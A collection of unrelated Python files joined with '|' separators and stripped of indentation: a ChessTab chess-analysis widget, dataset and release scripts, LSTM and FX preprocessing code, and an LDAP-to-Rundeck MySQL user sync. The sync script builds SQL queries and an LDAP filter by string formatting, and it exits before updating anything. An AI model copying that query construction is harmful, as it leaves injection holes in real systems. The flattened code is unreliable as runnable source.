The Board widget is used as the board argument in the super().__init__
and AnalysisScore calls.
tags_variations_comments_font is used as the tags_variations_comments_font
argument in the super().__init__ and AnalysisScore calls.
moves_played_in_game_font is used as the moves_played_in_game_font
argument in the super().__init__ and AnalysisScore calls.
items_manager is used as the items_manager argument in the
super().__init__ and AnalysisScore calls.
itemgrid is used as the itemgrid argument in the super().__init__ and
AnalysisScore calls.
boardfont is used as the boardfont argument in the Board call.
gameclass is used as the gameclass argument in the super().__init__ call.
Analysis of the game's current position, where available, is provided by
an AnalysisDS instance from the dpt.analysisds or basecore.analysisds
modules.
"""
# Some menu popup entries in the Game hierarchy declare their location
# as 'before Analyse' or 'before Export'. This is a convenient way of
# getting the popup entries in the desired order, taking order of
# execution of various methods into account: nothing special about the
# analyse or export entries otherwise.
analyse_popup_label = EventSpec.analyse_game[1]
export_popup_label = EventSpec.menu_database_export[1]
def __init__(
self,
master=None,
tags_variations_comments_font=None,
moves_played_in_game_font=None,
boardfont=None,
gameclass=GameDisplayMoves,
ui=None,
items_manager=None,
itemgrid=None,
**ka
):
"""Create Frame and Board, then delegate, then set grid geometry."""
self.ui = ui
panel = tkinter.Frame(master, borderwidth=2, relief=tkinter.RIDGE)
panel.bind("<Configure>", self.try_event(self._on_configure))
panel.grid_propagate(False)
board = Board(panel, boardfont=boardfont, ui=ui)
super().__init__(
panel,
board,
tags_variations_comments_font=tags_variations_comments_font,
moves_played_in_game_font=moves_played_in_game_font,
gameclass=gameclass,
items_manager=items_manager,
itemgrid=itemgrid,
**ka
)
self.scrollbar.grid(column=2, row=0, rowspan=1, sticky=tkinter.NSEW)
self.analysis = AnalysisScore(
panel,
board,
owned_by_game=self,
tags_variations_comments_font=tags_variations_comments_font,
moves_played_in_game_font=moves_played_in_game_font,
gameclass=GameAnalysis,
items_manager=items_manager,
itemgrid=itemgrid,
**ka
)
self.score.tag_configure(FORCED_INDENT_TAG, lmargin1=20)
self.score.tag_configure(MOVETEXT_INDENT_TAG, lmargin2=20)
self.score.tag_configure(MOVETEXT_MOVENUMBER_TAG, elide=tkinter.FALSE)
self.analysis.score.configure(wrap=tkinter.WORD)
self.analysis.score.tag_configure(ANALYSIS_INDENT_TAG, lmargin2=80)
self.analysis.score.tag_configure(
ANALYSIS_PGN_TAGS_TAG, elide=tkinter.TRUE
)
self.analysis.scrollbar.grid(
column=2, row=1, rowspan=1, sticky=tkinter.NSEW
)
self.board.get_top_widget().grid(
column=0, row=0, rowspan=1, sticky=tkinter.NSEW
)
self.score.grid(column=1, row=0, rowspan=1, sticky=tkinter.NSEW)
self.analysis.score.grid(
column=0, row=1, columnspan=2, sticky=tkinter.NSEW
)
if not ui.show_analysis:
panel.after_idle(self.hide_game_analysis)
if not ui.visible_scrollbars:
panel.after_idle(self.hide_scrollbars)
self.configure_game_widget()
# True means analysis widget refers to same position as game widget; so
# highlighting of analysis still represents future valid navigation.
# Any navigation in game widget makes any highlighting in analysis
# widget out of date.
self.game_position_analysis = False
self.game_analysis_in_progress = False
self.takefocus_widget = self.score
self.analysis_data_source = None
def get_top_widget(self):
"""Return topmost widget for game display."""
return self.panel
def destroy_widget(self):
"""Destroy the widget displaying game."""
# Avoid "OSError: [WinError 535] Pipe connected" at Python3.3 running
# under Wine on FreeBSD 10.1 by disabling the UCI functions.
# Assume all later Pythons are affected because they do not install
# under Wine at time of writing.
# The OSError stopped happening by wine-2.0_3,1 on FreeBSD 10.1 but
# get_nowait() fails to 'not wait', so ChessTab never gets going under
# wine at present. Leave alone because it looks like the problem is
# being shifted constructively.
# At Python3.5 running under Wine on FreeBSD 10.1, get() does not wait
# when the queue is empty either, and ChessTab does not run under
# Python3.3 because it uses asyncio: so no point in disabling.
# try:
# self.ui.uci.uci.ui_analysis_queue.put(
# (self.analysis.score, self.analysis.score))
# except AttributeError:
# if self.ui.uci.uci.uci_drivers_reply is not None:
# raise
self.ui.uci.uci.ui_analysis_queue.put(
(self.analysis.score, self.analysis.score)
)
self.panel.destroy()
def _on_configure(self, event=None):
"""Catch initial configure and rebind to on_configure."""
# Not sure, at time of writing this, how partial.py is
# different but that module does not need this trick to display
# the control with the right size on creation.
# Here extra first event has width=1 height=1 followed up by event
# with required dimensions.
self.panel.bind("<Configure>", self.try_event(self.on_configure))
def on_configure(self, event=None):
"""Reconfigure board and score after container has been resized."""
self.configure_game_widget()
self.see_current_move()
def _analyse_position(self, *position):
analysis = self.get_analysis(*position)
self.refresh_analysis_widget_from_database(analysis)
if self.game_analysis_in_progress:
if not self.ui.uci.uci.is_positions_pending_empty():
return
self.game_analysis_in_progress = False
analysis.variations.clear()
# Avoid "OSError: [WinError 535] Pipe connected" at Python3.3 running
# under Wine on FreeBSD 10.1 by disabling the UCI functions.
# Assume all later Pythons are affected because they do not install
# under Wine at time of writing.
# The OSError stopped happening by wine-2.0_3,1 on FreeBSD 10.1 but
# get_nowait() fails to 'not wait', so ChessTab never gets going under
# wine at present. Leave alone because it looks like the problem is
# being shifted constructively.
# At Python3.5 running under Wine on FreeBSD 10.1, get() does not wait
# when the queue is empty either, and ChessTab does not run under
# Python3.3 because it uses asyncio: so no point in disabling.
# try:
# self.ui.uci.uci.ui_analysis_queue.put((self.analysis.score, pa))
# except AttributeError:
# if self.ui.uci.uci.uci_drivers_reply is not None:
# raise
self.ui.uci.uci.ui_analysis_queue.put((self.analysis.score, analysis))
def set_game_board(self):
"""Set board to show position after highlighted move."""
# Assume setting new position implies analysis is out of date.
# Caller should reset to True if sure analysis still refers to game
# position. (Probably just F7 or F8 to the game widget.)
self.game_position_analysis = False
if not super().set_game_board():
return
if self.current is None:
position = self.fen_tag_tuple_square_piece_map()
else:
position = self.tagpositionmap[self.current]
self._analyse_position(*position)
def set_and_tag_item_text(self, reset_undo=False):
"""Delegate then queue analysis request to chess engines."""
try:
super().set_and_tag_item_text(reset_undo=reset_undo)
except ScoreNoGameException:
return
self.score.tag_add(MOVETEXT_INDENT_TAG, "1.0", tkinter.END)
self._analyse_position(*self.fen_tag_tuple_square_piece_map())
def analyse_game(self):
"""Analyse all positions in game using all active engines."""
uci = self.ui.uci.uci
sas = self.analysis.score
sga = self.get_analysis
self.game_analysis_in_progress = True
for value in self.tagpositionmap.values():
analysis = sga(*value)
analysis.variations.clear()
# Avoid "OSError: [WinError 535] Pipe connected" at Python3.3
# running under Wine on FreeBSD 10.1 by disabling the UCI functions.
# Assume all later Pythons are affected because they do not install
# under Wine at time of writing.
# The OSError stopped happening by wine-2.0_3,1 on FreeBSD 10.1 but
# get_nowait() fails to 'not wait', so ChessTab never gets going
# under wine at present. Leave alone because it looks like the
# problem is being shifted constructively.
# At Python3.5 running under Wine on FreeBSD 10.1, get() does not
# wait when the queue is empty either, and ChessTab does not run
# under Python3.3 because it uses asyncio: so no point in disabling.
# try:
# uci.ui_analysis_queue.put((sas, pa))
# except AttributeError:
# if uci.uci_drivers_reply is not None:
# raise
# break
uci.ui_analysis_queue.put((sas, analysis))
def hide_game_analysis(self):
"""Hide the widgets which show analysis from chess engines."""
self.analysis.score.grid_remove()
self.analysis.scrollbar.grid_remove()
self.score.grid_configure(rowspan=2)
if self.score.grid_info()["columnspan"] == 1:
self.scrollbar.grid_configure(rowspan=2)
self.configure_game_widget()
self.see_current_move()
def show_game_analysis(self):
"""Show the widgets which show analysis from chess engines."""
self.score.grid_configure(rowspan=1)
if self.score.grid_info()["columnspan"] == 1:
self.scrollbar.grid_configure(rowspan=1)
self.analysis.score.grid_configure(columnspan=2)
self.analysis.scrollbar.grid_configure()
else:
self.analysis.score.grid_configure(columnspan=3)
self.configure_game_widget()
self.see_current_move()
def hide_scrollbars(self):
"""Hide the scrollbars in the game display widgets."""
self.scrollbar.grid_remove()
self.analysis.scrollbar.grid_remove()
self.score.grid_configure(columnspan=2)
if self.score.grid_info()["rowspan"] == 1:
self.analysis.score.grid_configure(columnspan=3)
self.configure_game_widget()
self.see_current_move()
def show_scrollbars(self):
"""Show the scrollbars in the game display widgets."""
self.score.grid_configure(columnspan=1)
if self.score.grid_info()["rowspan"] == 1:
self.scrollbar.grid_configure(rowspan=1)
self.analysis.score.grid_configure(columnspan=2)
self.analysis.scrollbar.grid_configure()
else:
self.scrollbar.grid_configure(rowspan=2)
self.configure_game_widget()
self.see_current_move()
def toggle_analysis_fen(self):
"""Toggle display of FEN in analysis widgets."""
widget = self.analysis.score
if int(widget.tag_cget(ANALYSIS_PGN_TAGS_TAG, "elide")):
widget.tag_configure(ANALYSIS_PGN_TAGS_TAG, elide=tkinter.FALSE)
else:
widget.tag_configure(ANALYSIS_PGN_TAGS_TAG, elide=tkinter.TRUE)
self.see_current_move()
def toggle_game_move_numbers(self):
"""Toggle display of move numbers in game score widgets."""
widget = self.score
if int(widget.tag_cget(MOVETEXT_MOVENUMBER_TAG, "elide")):
widget.tag_configure(MOVETEXT_MOVENUMBER_TAG, elide=tkinter.FALSE)
else:
widget.tag_configure(MOVETEXT_MOVENUMBER_TAG, elide=tkinter.TRUE)
self.see_current_move()
def refresh_analysis_widget_from_engine(self, analysis):
"""Refresh game widget with updated chess engine analysis."""
uci = self.ui.uci.uci
move_played = self.get_move_for_start_of_analysis()
if analysis.position in uci.position_analysis:
new_text = uci.position_analysis[
analysis.position
].translate_analysis_to_pgn(move_played=move_played)
else:
new_text = []
new_text.append(UNKNOWN_RESULT)
if move_played:
new_text.insert(0, move_played)
new_text.insert(
0,
"".join(
(
START_TAG,
TAG_FEN,
'"',
analysis.position,
END_TAG.join('"\n'),
)
),
)
new_text = "".join(new_text)
if new_text == self.analysis.analysis_text:
return
# Assume TypeError exception happens because analysis is being shown
# for a position which is checkmate or stalemate.
try:
self.analysis.collected_game = next(
PGN(game_class=self.analysis.gameclass).read_games(new_text)
)
except TypeError:
pass
# Assume analysis movetext problems occur only if editing moves.
# if not pgn.is_movetext_valid():
if not self.analysis.collected_game.is_movetext_valid():
return
self.analysis.clear_score()
self.analysis.set_score(new_text)
try:
fmog = self.analysis.select_first_move_of_game()
except tkinter.TclError:
fmog = False
if fmog:
widget = self.analysis.score
widget.tag_add(
ANALYSIS_INDENT_TAG, widget.tag_ranges(fmog)[0], tkinter.END
)
widget.tag_add(
ANALYSIS_PGN_TAGS_TAG, "1.0", widget.tag_ranges(fmog)[0]
)
def refresh_analysis_widget_from_database(self, analysis):
"""Refresh game widget with updated chess engine analysis."""
# When a database is open the analysis is refreshed from the database
# while checking if that analysis is up-to-date compared with the depth
# and multiPV parameters held in self.uci.uci UCI object.
if self.ui.database is None:
self.refresh_analysis_widget_from_engine(analysis)
return
# Assume TypeError exception happens because analysis is being shown
# for a position which is checkmate or stalemate.
try:
new_text = analysis.translate_analysis_to_pgn(
self.get_move_for_start_of_analysis()
)
except TypeError:
return
if new_text == self.analysis.analysis_text:
return
# Assume TypeError exception happens because analysis is being shown
# for a position which is checkmate or stalemate.
try:
self.analysis.collected_game = next(
PGN(game_class=self.analysis.gameclass).read_games(new_text)
)
except TypeError:
pass
self.analysis.clear_score()
self.analysis.set_score(new_text)
try:
fmog = self.analysis.select_first_move_of_game()
except tkinter.TclError:
fmog = False
if fmog:
widget = self.analysis.score
widget.tag_add(
ANALYSIS_INDENT_TAG, widget.tag_ranges(fmog)[0], tkinter.END
)
widget.tag_add(
ANALYSIS_PGN_TAGS_TAG, "1.0", widget.tag_ranges(fmog)[0]
)
def refresh_analysis_widget(self, analysis):
"""Refresh game widget with new chess engine analysis."""
# This method called at regular intervals to cope with fresh analysis
# of displayed positions due to changes in engine parameters (depth
# and multiPV). Need a set of new analysis since last call.
self.refresh_analysis_widget_from_database(analysis)
def configure_game_widget(self):
"""Configure board and score widgets for a game display."""
width = self.panel.winfo_width()
height = self.panel.winfo_height()
borderwidth = self.panel.cget("borderwidth")
if self.ui.show_analysis:
row_minsize = (height - borderwidth * 2) // 2
column_minsize = width - row_minsize
else:
row_minsize = height - borderwidth * 2
column_minsize = width - borderwidth * 2
measure = (row_minsize + column_minsize) // 3
if measure * 3 > column_minsize * 2:
measure = (column_minsize * 2) // 3
elif measure > row_minsize:
measure = row_minsize
row_minsize = row_minsize - measure
column_minsize = column_minsize - measure
self.panel.grid_rowconfigure(1, minsize=row_minsize)
self.panel.grid_columnconfigure(1, minsize=column_minsize)
self.panel.grid_rowconfigure(0, weight=1)
self.panel.grid_rowconfigure(1, weight=1)
self.panel.grid_columnconfigure(0, weight=1)
self.panel.grid_columnconfigure(1, weight=1)
self.panel.grid_columnconfigure(2, weight=0)
def set_primary_activity_bindings(self, switch=True):
"""Delegate then set board pointer move navigation bindings."""
super().set_primary_activity_bindings(switch=switch)
if self.score is self.takefocus_widget:
self.set_board_pointer_move_bindings(switch=switch)
else:
self.analysis.set_board_pointer_move_bindings(switch=switch)
def set_select_variation_bindings(self, switch=True):
"""Delegate then set board pointer select variation bindings."""
super().set_select_variation_bindings(switch=switch)
if self.score is self.takefocus_widget:
self.set_board_pointer_select_variation_bindings(switch=switch)
else:
self.analysis.set_board_pointer_select_variation_bindings(
switch=switch
)
# It is not wrong to activate, or deactivate, all three sets of bindings
# for both self(.score) and self.analysis(.score) but the current choice
# is to leave Database and Close Item bindings out of self.analysis.
# Database and Close Item refer to the item, game or repertoire, not the
# engine analysis.
def set_database_navigation_close_item_bindings(self, switch=True):
"""Enable or disable bindings for navigation and database selection."""
self.set_event_bindings_score(
self.get_database_events(), switch=switch
)
self.set_event_bindings_score(
self.get_navigation_events(), switch=switch
)
self.set_event_bindings_score(
self.get_close_item_events(), switch=switch
)
self.analysis.set_event_bindings_score(
self.get_navigation_events(), switch=switch
)
def set_board_pointer_widget_navigation_bindings(self, switch):
"""Enable or disable bindings for widget selection."""
self.set_event_bindings_board(
self.get_modifier_buttonpress_suppression_events(), switch=switch
)
self.set_event_bindings_board(
(
(EventSpec.buttonpress_1, self.give_focus_to_widget),
(EventSpec.buttonpress_3, self.post_inactive_menu),
),
switch=switch,
)
def set_score_pointer_widget_navigation_bindings(self, switch):
"""Set or unset pointer bindings for widget navigation."""
self.set_event_bindings_board(
self.get_modifier_buttonpress_suppression_events(), switch=switch
)
if not switch:
bindings = (
(EventSpec.buttonpress_1, self.press_break),
(EventSpec.buttonpress_3, self.press_break),
)
self.set_event_bindings_score(bindings)
self.analysis.set_event_bindings_score(bindings)
else:
bindings = ((EventSpec.buttonpress_1, self.give_focus_to_widget),)
self.set_event_bindings_score(bindings)
self.analysis.set_event_bindings_score(bindings)
self.set_event_bindings_score(
((EventSpec.buttonpress_3, self.post_inactive_menu),)
)
self.analysis.set_event_bindings_score(
((EventSpec.buttonpress_3, self.analysis.post_inactive_menu),)
)
def set_toggle_game_analysis_bindings(self, switch):
"""Set keystoke bindings to switch between game and analysis."""
self.set_event_bindings_score(
((EventSpec.scoresheet_to_analysis, self.analysis_current_item),)
)
self.analysis.set_event_bindings_score(
((EventSpec.analysis_to_scoresheet, self.current_item),)
)
def set_score_pointer_to_score_bindings(self, switch):
"""Set score pointer bindings to go to game."""
self.set_event_bindings_score(
((EventSpec.alt_buttonpress_1, self.current_item),), switch=switch
)
def set_analysis_score_pointer_to_analysis_score_bindings(self, switch):
"""Set analysis score pointer bindings to go to analysis score."""
self.analysis.set_event_bindings_score(
((EventSpec.alt_buttonpress_1, self.analysis_current_item),),
switch=switch,
)
def set_colours(self, sbg, bbg, bfg):
"""Set colours and fonts used to display games.
sbg == True - set game score colours
bbg == True - set board square colours
bfg == True - set board piece colours
"""
if sbg:
for widget in self, self.analysis:
widget.score.tag_configure(
"l_color", background=widget.l_color
)
widget.score.tag_configure(
"m_color", background=widget.m_color
)
widget.score.tag_configure(
"am_color", background=widget.am_color
)
widget.score.tag_configure(
"v_color", background=widget.v_color
)
if bbg:
self.board.set_color_scheme()
if bfg:
self.board.draw_board()
def set_position_analysis_data_source(self):
"""Attach database analysis for position to game widget."""
if self.ui is None:
self.analysis_data_source = None
return
self.analysis_data_source = (
self.ui.make_position_analysis_data_source()
)
def get_analysis(self, *a):
"""Return database analysis for position or empty position Analysis.
get_analysis is not interested in the arguments, which are passed on
to self.generate_fen_for_position().
"""
if self.analysis_data_source:
return self.analysis_data_source.get_position_analysis(
self.generate_fen_for_position(*a)
)
return Analysis(position=self.generate_fen_for_position(*a))
@staticmethod
def generate_fen_for_position(squares, *a):
"""Return FEN for current position.
Ensure the Piece instances in the squares dictionary reference their
squares key value in the Piece.square attribute before calling the
generate_fen_for_position() function imported from pgn_read.core.game.
These can be different while choosing which of the pieces of a type,
usually two, can make the move specified in the PGN.
"""
for square, piece in squares.items():
piece.set_square(square)
return generate_fen_for_position(squares.values(), *a)
def create_primary_activity_popup(self):
"""Delegate then add navigation submenu and return popup menu."""
popup = super().create_primary_activity_popup()
self.set_popup_bindings(
popup,
((EventSpec.analyse_game, self.analyse_game),),
index=self.export_popup_label,
)
self.create_widget_navigation_submenu_for_popup(popup)
return popup
def create_select_move_popup(self):
"""Delegate then add navigation submenu and return popup menu."""
popup = super().create_select_move_popup()
self.create_widget_navigation_submenu_for_popup(popup)
return popup
def set_statusbar_text(self):
"""Set status bar to display player name PGN Tags."""
tags = self.collected_game._tags
self.ui.statusbar.set_status_text(
" ".join(
[tags.get(k, "") for k in STATUS_SEVEN_TAG_ROSTER_PLAYERS]
)
)
|
import argparse
from torchvision.datasets import MNIST, FashionMNIST, CIFAR10
import yaml
def main(args):
MNIST(args.data_path, download=True)
FashionMNIST(args.data_path, download=True)
CIFAR10(args.data_path, download=True)
with open('config/base.yml', 'r') as fin:
cfg = yaml.load(fin.read(), yaml.SafeLoader)
cfg['root'] = args.data_path
with open('config/base.yml', 'w') as fin:
yaml.dump(cfg, fin, default_flow_style=False)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Dataset Download")
parser.add_argument("--data_path", type=str, required=True)
args = parser.parse_args()
main(args)
|
#!/usr/bin/env python
# The MIT License (MIT)
#
# Copyright (c) 2015 Mike Johnson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# TODO: Add some argparse stuff later
#import argparse
import ldap
import mysql.connector
import sys
################################################################
# !! BEGIN: user configuration
################################################################
# Exclusion List: local accounts, do not check for updates
# -------------------------------------------------------------
exclusion = ['admin', 'administrator']
# LDAP Credentials
# --------------------------------------------------------------
ldapserver = "ldap://<server>:<port>"
binddn = "CN=<bind user>,CN=Users,dc=<domain>,dc=<tld>"
bindpw = "<bind user pass>"
basedn = "CN=Users,DC=<domain>,DC=<tld>"
# MySQL Credentials
# --------------------------------------------------------------
mysqlsvr = "localhost"
mysql_db = "<rundeck mysql database>"
mysqlusr = "<rundeck mysql username>"
mysqlpwd = "<rundeck mysql password>"
################################################################
# !! END: user configuration
################################################################
def ldap_search(username):
# LDAP Search
searchFilter = "(&(objectclass=User)(sAMAccountName=%s))" % username
searchAttribute = ["givenName","sn","mail"]
l = ldap.initialize(ldapserver) # Initialize LDAP
searchScope = ldap.SCOPE_SUBTREE # this will scope the entire subtree under UserUnits
# Bind to the server
try:
l.protocol_version = ldap.VERSION3
l.simple_bind_s(binddn, bindpw)
except ldap.INVALID_CREDENTIALS:
sys.exit(0)
except ldap.LDAPError, e:
if type(e.message) == dict and e.message.has_key('desc'):
sys.exit(0)
else:
sys.exit(0)
try:
ldap_result_id = l.search(basedn, searchScope, searchFilter, searchAttribute)
result_set = []
result_type, result_data = l.result(ldap_result_id, 0)
if (result_data == []):
# aww, no data found
data = None
else:
# yay, we found some data
if result_type == ldap.RES_SEARCH_ENTRY:
result_set.append(result_data)
cn = result_data[0][0] # cn Returned first
data = result_data[0][1] # searchAttributes second
# Clean up the data items for easy access
for (i, j) in data.items():
if len(j) == 1:
data[i] = j[0]
return data
except ldap.LDAPError, e:
sys.exit(0)
finally:
l.unbind_s()
return 0
def mysql_update(cursor, username, userdata):
query = "UPDATE rduser SET first_name='{}', last_name='{}', email='{}' WHERE login='{}'".format(
userdata["givenName"], userdata["sn"], userdata["mail"], username)
cursor.execute(query)
def mysql_search():
cnx = mysql.connector.connect(host=mysqlsvr, user=mysqlusr, password=mysqlpwd, database=mysql_db)
cur = cnx.cursor()
query = "SELECT login from rduser where email is NULL and login <> 'admin'"
for login in exclusion:
query += " and login <> '{}'".format(login)
print query
cur.execute(query)
result = cur.fetchall()
print result
sys.exit(0)
for login in result:
userdata = ldap_search(login[0])
mysql_update(cur, login[0], userdata)
cur.close()
cnx.commit()
cnx.close()
def main():
# TODO: Add some argparse
# --full-update ?
mysql_search()
if __name__ == "__main__":
main()
|
import argparse
import os
import pickle
import tensorflow as tf
from pathlib import Path
def str2bool(v):
if isinstance(v, bool):
return v
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def split_input_target(chunk):
input_text = chunk[:-1]
target_text = chunk[1:]
return input_text, target_text
def load_configs(directory):
path = os.path.join(directory, "parameters.bin")
return pickle.loads(open(path,'rb').read())
def save_model_configs(directory, params):
Path(directory).mkdir(parents=True, exist_ok=True)
path = os.path.join(directory, "parameters.bin")
dumped = pickle.dumps(params)
f = open(path, 'wb+')
f.write(dumped)
def build_model(vocab_size, embedding_dim, rnn_units, batch_size, layers_amount):
layers = [tf.keras.layers.Embedding(vocab_size, embedding_dim, batch_input_shape=[batch_size, None])] # First layer
for n in range(layers_amount):
layers.append(tf.keras.layers.LSTM(rnn_units, return_sequences=True, stateful=True, recurrent_initializer='glorot_uniform')) # Creating the rest of the layers
layers.append(tf.keras.layers.Dense(vocab_size)) # Creating last layer
model = tf.keras.Sequential(layers) # Converting the layers into a model
return model
def setup_args():
parser = argparse.ArgumentParser(description='List of avaible commands.')
# The path where the file is
parser.add_argument('--data', dest="data", type=str, nargs='?', help='Path to the file to train on')
# Where it's going to save the checkpoints
parser.add_argument('--save', dest="save", type=str, nargs='?',
help='Path to where the checkpoints should be saved')
# Epochs amount
parser.add_argument('--epochs', dest="epochs", metavar="100", type=int, nargs='?', help='Number of epochs',
default=100)
# Batch size
parser.add_argument('--batch', dest="batch", metavar="64", type=int, nargs='?', help='Batch size', default=64)
# LSTM unit's number
parser.add_argument('--units', dest="units", metavar="512", type=int, nargs='?', help='Number of LSTM Units',
default=512)
# LSTM unit's layers
parser.add_argument('--layers', dest="layers", metavar="3", type=int, nargs='?', help='Number of LSTM Layers',
default=3)
# The maximum length of chars
parser.add_argument('--length', dest="length", metavar="100", type=int, nargs='?',
help='The maximum length sentence for a single input in characters', default=100)
# Embedding size
parser.add_argument('--embedding', dest="embedding", metavar="128", type=int, nargs='?',
help='The embedding dimension size', default=128)
# Continue from last checkpoint
parser.add_argument("--continue", dest="cont", metavar="False", type=str2bool, nargs='?', const=True,
default=False, help="Continue from last save.")
# Just for shuffling so it won't shuffle all of the text once
parser.add_argument("--buffer", dest="buffer", metavar="10000", type=int, nargs='?',
default=10000, help="Buffer size to shuffle the dataset")
# How many batches the train has to wait before notifying on process
parser.add_argument("--notify", dest="notify", metavar="100", type=int, nargs='?',
default=100, help="Notify process once every X batches")
# How much epochs it should wait before saving
parser.add_argument("--saving_after", dest="saving_after", metavar="1", type=int, nargs='?',
default=1, help="How much epochs it should wait before saving")
return parser.parse_args()
|
from PreProcessors.interface import PreProcessorInterface
from Parsers.csv_parser_FX import Parser
import matplotlib.pyplot as plt
import numpy as np
from keras.utils import np_utils
import math
class PreProcessor(PreProcessorInterface):
def __init__(self, filename):
self.__pre_data = []
for file in filename:
self.parser = Parser(file)
self.parser.open()
self.__pre_data += [self.parser.get_data()]
self.parser.close()
self.__train_data_x = None
self.__train_data_y = None
self.__test_data_x = None
self.__test_data_y = None
self.__all_data_x = []
self.__all_data_y = []
self.__train_len = 0
self.__len = 0
self.__ws = 0
def start(self, ws_pred=20, ws_future=7, grade=20):
self.__ws = ws_pred
size = len(self.__pre_data[0])
for i in range(size - ws_pred - ws_future):
matr = self.__matrix_compute(i, ws_pred)
self.__all_data_x.append(np.array(matr))
self.__all_data_y.append(self.__trend_compute(i, ws_pred, ws_future, grade))
self.__len = int(len(self.__all_data_x) * 0.8)
self.__process_train()
self.__process_test()
def __matrix_compute(self, i, j):
matrix = []
for pre_data in self.__pre_data:
matr = np.zeros((j, j))
data = pre_data[i:i + j]
tmp = np.array(data) / np.linalg.norm(np.array(data))
for ix, x in enumerate(tmp):
for iy, y in enumerate(tmp):
matr[ix][iy] = x * y - math.sqrt(1 - x * x) * math.sqrt(1 - y * y)
matrix.append(matr)
return matrix
def __trend_compute(self, i, j, k, g=20):
ans = []
for pre_data in self.__pre_data:
delta = pre_data[i+j-1] - pre_data[i+j+k-1]
if delta < -g:
ans.append(0)
elif -g <= delta <= g:
ans.append(1)
elif g < delta:
ans.append(2)
return ans[1]
@staticmethod
def plt_show(matr):
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
ax.set_aspect('equal')
plt.imshow(matr, interpolation='nearest', cmap=plt.cm.ocean)
plt.colorbar()
plt.show()
def __process_train(self):
self.__train_data_x = np.array(self.__all_data_x[:self.__len])\
.reshape(self.__len, self.__ws, self.__ws, 3)
self.__train_data_y = np.array(self.__all_data_y[:self.__len])
self.__train_data_y = np_utils.to_categorical(self.__train_data_y, 3)
def __process_test(self):
self.__test_data_x = np.array(self.__all_data_x[self.__len:])\
.reshape(len(self.__all_data_x)-self.__len, self.__ws, self.__ws, 3)
self.__test_data_y = np.array(self.__all_data_y[self.__len:])
self.__test_data_y = np_utils.to_categorical(self.__test_data_y, 3)
def get_train(self):
return self.__train_data_x, self.__train_data_y
def get_test(self):
return self.__test_data_x, self.__test_data_y
def get_all_data(self):
return self.__all_data_x, self.__all_data_y
|
#!/usr/bin/env python3
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Copyright (c) 2014-2021, Lars Asplund lars.anders.asplund@gmail.com
"""
Create and validates new tagged release commits
The release process is described in the Contributing section of the web page
"""
import argparse
import json
from urllib.request import urlopen # pylint: disable=no-name-in-module, import-error
import sys
from pathlib import Path
import subprocess
from shutil import which
def main():
"""
Create a new tagged release commit
"""
args = parse_args()
if args.cmd == "create":
version = args.version[0]
major, minor, patch = parse_version(version)
print(f"Attempting to create new release {version!s}")
set_version(version)
validate_new_release(version, pre_tag=True)
make_release_commit(version)
new_version = f"{major:d}.{minor:d}.{patch + 1:d}rc0"
set_version(new_version)
make_next_pre_release_commit(new_version)
elif args.cmd == "validate":
version = get_local_version()
validate_new_release(version, pre_tag=False)
print(f"Release {version!s} is validated for publishing")
def parse_args():
"""
Parse command line arguments
"""
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers()
create = subparsers.add_parser("create")
create.add_argument("version", nargs=1, help="The version to release")
create.set_defaults(cmd="create")
validate = subparsers.add_parser("validate")
validate.set_defaults(cmd="validate")
return parser.parse_args()
def make_release_commit(version):
"""
Add release notes and make the release commit
"""
run(["git", "add", str(release_note_file_name(version))])
run(["git", "add", str(ABOUT_PY)])
run(["git", "commit", "-m", f"Release {version!s}"])
run(["git", "tag", f"v{version!s}", "-a", "-m", f"release {version!s}"])
def make_next_pre_release_commit(version):
"""
Add release notes and make the release commit
"""
run(["git", "add", str(ABOUT_PY)])
run(["git", "commit", "-m", f"Start of next release candidate {version!s}"])
def validate_new_release(version, pre_tag):
"""
Check that a new release is valid or exit
"""
release_note = release_note_file_name(version)
if not release_note.exists():
print(f"Not releasing version {version!s} since release note {release_note!s} does not exist")
sys.exit(1)
with release_note.open("r") as fptr:
if not fptr.read():
print(f"Not releasing version {version!s} since release note {release_note!s} is empty")
sys.exit(1)
if pre_tag and check_tag(version):
print(f"Not creating new release {version!s} since tag v{version!s} already exist")
sys.exit(1)
if not pre_tag and not check_tag(version):
print(f"Not releasing version {version!s} since tag v{version!s} does not exist")
sys.exit(1)
with urlopen("https://pypi.python.org/pypi/vunit_hdl/json") as fptr:
info = json.load(fptr)
if version in info["releases"].keys():
print(f"Version {version!s} has already been released")
sys.exit(1)
def parse_version(version_str):
"""
Create a 3-element tuple with the major,minor,patch version
"""
return tuple((int(elem) for elem in version_str.split(".")))
def set_version(version):
"""
Update vunit/about.py with correct version
"""
with ABOUT_PY.open("r") as fptr:
content = fptr.read()
print(f"Set local version to {version!s}")
content = content.replace(f'VERSION = "{get_local_version()!s}"', f'VERSION = "{version!s}"')
with ABOUT_PY.open("w") as fptr:
fptr.write(content)
assert get_local_version() == version
def release_note_file_name(version) -> Path:
return REPO_ROOT / "docs" / "release_notes" / (version + ".rst")
def get_local_version():
"""
Return the local python package version and check if corresponding release
notes exist
"""
version = subprocess.check_output([sys.executable, str(REPO_ROOT / "setup.py"), "--version"]).decode().strip()
return version
def check_tag(version):
